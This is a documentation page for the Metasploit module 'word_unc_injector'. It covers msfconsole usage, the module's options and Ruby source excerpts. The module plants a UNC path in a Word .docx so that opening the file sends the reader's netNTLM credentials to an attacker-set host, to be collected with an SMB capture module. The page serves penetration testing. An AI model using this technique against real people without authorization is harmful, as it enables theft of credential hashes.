Microsoft Word UNC Path Injector - Metasploit

This page contains detailed information about how to use the auxiliary/docx/word_unc_injector metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

---

Name: Microsoft Word UNC Path Injector
Module: auxiliary/docx/word_unc_injector
Source code: modules/auxiliary/docx/word_unc_injector.rb
Disclosure date: -
Last modification time: 2022-03-10 18:03:35 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

Module Ranking and Traits

---

Module Ranking:

• normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

---

msf > use auxiliary/docx/word_unc_injector
msf auxiliary(word_unc_injector) > show targets
    ... a list of targets ...
msf auxiliary(word_unc_injector) > set TARGET target-id
msf auxiliary(word_unc_injector) > show options
    ... show and set options ...
msf auxiliary(word_unc_injector) > exploit

Required Options

---

• LHOST: Server IP or hostname that the .docx document points to.

Go back to menu.

Msfconsole Usage

---

Here is how the docx/word_unc_injector auxiliary module looks in the msfconsole:

msf6 > use auxiliary/docx/word_unc_injector

msf6 auxiliary(docx/word_unc_injector) > show info

       Name: Microsoft Word UNC Path Injector
     Module: auxiliary/docx/word_unc_injector
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  SphaZ <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DOCAUTHOR                   no        Document author for empty document.
  FILENAME   msf.docx         yes       Document output filename.
  LHOST                       yes       Server IP or hostname that the .docx document points to.
  SOURCE                      no        Full path and filename of .docx file to use as source. If empty, creates new document.

Description:
  This module modifies a .docx file that will, upon opening, submit 
  stored netNTLM credentials to a remote host. It can also create an 
  empty docx file. If emailed the receiver needs to put the document 
  in editing mode before the remote server will be contacted. Preview 
  and read-only mode do not work. Verified to work with Microsoft Word 
  2003, 2007, 2010, and 2013. In order to get the hashes the 
  auxiliary/server/capture/smb module can be used.

References:
  https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534

Module Options

---

This is a complete list of options available in the docx/word_unc_injector auxiliary module:

msf6 auxiliary(docx/word_unc_injector) > show options

Module options (auxiliary/docx/word_unc_injector):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOCAUTHOR                   no        Document author for empty document.
   FILENAME   msf.docx         yes       Document output filename.
   LHOST                       yes       Server IP or hostname that the .docx document points to.
   SOURCE                      no        Full path and filename of .docx file to use as source. If empty, creates new document.

Advanced Options

---

Here is a complete list of advanced options supported by the docx/word_unc_injector auxiliary module:

msf6 auxiliary(docx/word_unc_injector) > show advanced

Module advanced options (auxiliary/docx/word_unc_injector):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   DisablePayloadHandler  true             no        Disable the handler code for the selected payload
   VERBOSE                false            no        Enable detailed status messages
   WORKSPACE                               no        Specify the workspace for this module

Auxiliary Actions

---

This is a list of all auxiliary actions that the docx/word_unc_injector module can do:

msf6 auxiliary(docx/word_unc_injector) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

---

Here is the full list of possible evasion options supported by the docx/word_unc_injector auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(docx/word_unc_injector) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

---

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Not enough rights to read the file. Aborting.

---

Here is a relevant code snippet related to the "Not enough rights to read the file. Aborting." error message:

91:	  # here we inject an UNC path into an existing file, and store the injected file in FILENAME
92:	  def manipulate_file
93:	    ref = "<w:attachedTemplate r:id=\"rId1\"/>"
94:	
95:	    if not File.stat(datastore['SOURCE']).readable?
96:	      print_error("Not enough rights to read the file. Aborting.")
97:	      return nil
98:	    end
99:	
100:	    # lets extract our docx and store it in memory
101:	    zip_data = unzip_docx

Bad "word/settings.xml" file, check if it is a valid .docx.

---

Here is a relevant code snippet related to the "Bad "word/settings.xml" file, check if it is a valid .docx." error message:

101:	    zip_data = unzip_docx
102:	
103:	    # file to check for reference file we need
104:	    file_content = zip_data["word/settings.xml"]
105:	    if file_content.nil?
106:	      print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
107:	      return nil
108:	    end
109:	
110:	    # if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
111:	    if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?

Cannot find insert point for reference into settings.xml

---

Here is a relevant code snippet related to the "Cannot find insert point for reference into settings.xml" error message:

127:	        vprint_status("DefaultTabStop found, we use this for insertion.")
128:	        file_content.insert(insert_one, ref )
129:	      end
130:	
131:	      if insert_one.nil? && insert_two.nil?
132:	        print_error("Cannot find insert point for reference into settings.xml")
133:	        return nil
134:	      end
135:	
136:	      # update the files that contain the injection and reference
137:	      zip_data["word/settings.xml"] = file_content

Error extracting <SOURCE> please verify it is a valid .docx document.

---

Here is a relevant code snippet related to the "Error extracting <SOURCE> please verify it is a valid .docx document." error message:

162:	        filezip.each do |entry|
163:	          zip_data[entry.name] = filezip.read(entry)
164:	        end
165:	      end
166:	    rescue Zip::Error => e
167:	      print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.")
168:	      return nil
169:	    end
170:	    return zip_data
171:	  end
172:	

Failed to create a document from <SOURCE>.

---

Here is a relevant code snippet related to the "Failed to create a document from <SOURCE>." error message:

185:	      make_new_file
186:	    else
187:	      # extract the word/settings.xml and edit in the reference we need
188:	      print_status("Injecting UNC path into existing document.")
189:	      if manipulate_file.nil?
190:	        print_error("Failed to create a document from #{datastore['SOURCE']}.")
191:	      else
192:	        print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.")
193:	      end
194:	    end
195:	  end

Go back to menu.

Related Pull Requests

---

• #12982 Merged Pull Request: Fix broken links to http://jedicorp.com/?p=534 with archive.org
• #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
• #8336 Merged Pull Request: Specify lhost by interface name
• #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
• #6655 Merged Pull Request: use MetasploitModule as a class name
• #6648 Merged Pull Request: Change metasploit class names
• #5059 Merged Pull Request: Yard doc corrections
• #2685 Merged Pull Request: Update description about suitable targets
• #2525 Merged Pull Request: Change module boilerplate
• #2426 Merged Pull Request: Find and replace Msf::Config.install_root, "data"
• #1425 Merged Pull Request: added word_unc_injector auxiliary module

References

---

• CVE: Not available
• https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534

See Also

---

Check also the following modules related to this module:

• post/windows/gather/word_unc_injector
• exploit/windows/fileformat/word_msdtjs_rce
• exploit/windows/fileformat/word_mshtml_rce
• auxiliary/admin/2wire/xslt_password_reset
• auxiliary/admin/http/dlink_dir_645_password_extractor
• auxiliary/admin/http/dlink_dsl320b_password_extractor
• auxiliary/admin/http/mantisbt_password_reset
• auxiliary/admin/http/netgear_soap_password_extractor
• auxiliary/admin/http/zyxel_admin_password_extractor
• auxiliary/admin/scada/modicon_password_recovery
• auxiliary/admin/vxworks/apple_airport_extreme_password
• auxiliary/dos/http/wordpress_directory_traversal_dos
• auxiliary/dos/http/wordpress_long_password_dos
• auxiliary/dos/http/wordpress_xmlrpc_dos
• auxiliary/gather/c2s_dvr_password_disclosure
• auxiliary/gather/ipcamera_password_disclosure
• auxiliary/gather/netgear_password_disclosure
• auxiliary/scanner/http/http_sickrage_password_leak
• auxiliary/scanner/http/wordpress_content_injection
• auxiliary/scanner/http/wordpress_cp_calendar_sqli
• auxiliary/scanner/http/wordpress_ghost_scanner
• auxiliary/scanner/http/wordpress_login_enum
• auxiliary/scanner/http/wordpress_multicall_creds
• auxiliary/scanner/http/wordpress_pingback_access
• auxiliary/scanner/http/wordpress_scanner
• auxiliary/scanner/http/wordpress_xmlrpc_login
• auxiliary/scanner/misc/raysharp_dvr_passwords
• auxiliary/scanner/misc/rosewill_rxs3211_passwords
• auxiliary/scanner/telnet/lantronix_telnet_password
• post/windows/manage/peinjector
• auxiliary/admin/aws/aws_launch_instances
• auxiliary/scanner/http/lucky_punch
• auxiliary/scanner/portscan/ftpbounce
• auxiliary/server/android_browsable_msf_launch
• auxiliary/server/socks_unc

Authors

---

• SphaZ <cyberphaz[at]gmail.com>

Version

---

This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.